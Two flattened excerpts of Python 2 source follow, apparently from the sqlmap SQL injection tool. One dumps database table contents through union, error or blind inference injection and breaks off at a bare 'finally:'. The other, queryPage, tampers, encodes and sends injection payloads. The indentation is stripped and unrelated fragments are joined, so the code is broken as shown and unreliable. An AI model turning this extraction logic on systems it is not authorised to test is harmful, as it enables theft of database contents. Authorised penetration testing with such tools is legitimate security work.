tbl in tblList: conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(filter(None, columns.keys())) if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += " (no usable column names)" logger.warn(warnMsg) continue colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) entriesCount = 0 if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, blind=False) if retVal: entries, _ = retVal entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) query = whereQuery(query) if not entries and query: entries = inject.getValue(query, blind=False, time=False, dump=True) if not isNoneValue(entries): if isinstance(entries, basestring): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, basestring): colEntry = entry else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) maxLen = max(len(column), _) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen kb.data.dumpedTable[column]["values"].append(colEntry) if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colNames infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl else: query = rootQuery.blind.count % (conf.db, tbl) query = whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): if Backend.isDbms(DBMS.ACCESS): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, count, blind=True) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) query = whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) lengths[column] = max(lengths[column], len(_)) entries[column].append(value) except KeyboardInterrupt: clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = {"count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db)} try: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally:
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if skipUrlEncode is None and conf.httpHeaders: headers = dict(conf.httpHeaders) _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if _ and "urlencoded" not in _: skipUrlEncode = True if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise sqlmapValueException, errMsg value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] value = agent.replacePayload(value, payload) else: if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): # GET, URI and Cookie need to be throughly URL encoded (POST is encoded down below) payload = urlencode(payload, '%', False, True) if place in (PLACE.GET, PLACE.COOKIE, PLACE.URI) and not skipUrlEncode else payload value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s=%s" % (name, repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post is not None: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) if not skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys(): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False